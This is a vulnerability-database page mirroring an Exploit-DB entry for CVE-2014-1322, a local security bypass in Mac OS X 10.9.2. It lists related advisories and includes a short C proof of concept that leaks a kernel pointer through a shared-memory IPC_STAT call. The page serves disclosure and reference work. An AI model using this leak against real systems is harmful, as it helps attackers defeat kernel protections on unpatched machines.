Lucene search
+L

Apple Mac OSX - Local Security Bypass

🗓️ 22 Apr 2014 00:00:00Reported by Ian BeerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Apple Mac OSX Local Security Bypass vulnerability in 10.9.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Mac OS X < 10.9.3 Multiple Vulnerabilities (Security Update 2014-002)
27 May 201400:00
nessus
nessus
Tenable Nessus
Mac OS X Multiple Vulnerabilities (Security Update 2014-002)
22 Apr 201400:00
nessus
circl
Circl
CVE-2014-1322
22 Apr 201400:00
circl
cve
CVE
CVE-2014-1322
23 Apr 201410:00
cve
cvelist
Cvelist
CVE-2014-1322
23 Apr 201410:00
cvelist
euvd
EUVD
EUVD-2014-1400
7 Oct 202500:30
euvd
nvd
NVD
CVE-2014-1322
23 Apr 201411:52
nvd
openvas
OpenVAS
Apple Mac OS X Multiple Vulnerabilities-02 (Nov 2016)
17 Nov 201600:00
openvas
prion
Prion
Design/Logic Flaw
23 Apr 201411:52
prion
securityvulns
securityvulns
APPLE-SA-2014-04-22-1 Security Update 2014-002
4 May 201400:00
securityvulns
Rows per page
// source: https://www.securityfocus.com/bid/67023/info

Apple Mac OS X is prone to a local security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.

Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected.

#include <stdio.h>
#include <strings.h>
#include <sys/shm.h>

int main(int argc, char *argv[])
{
  int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );

  if (shm < 0)
    {
      printf("shmget: failed");
      return 6;
    }

  struct shmid_ds lolz;

  int res = shmctl( shm, IPC_STAT, &lolz );
  if (res < 0)
    {
      printf("shmctl: failed");
      return 1;
    }

  printf( "%p\n", lolz.shm_internal );

}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jan 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.9
EPSS0.01085
21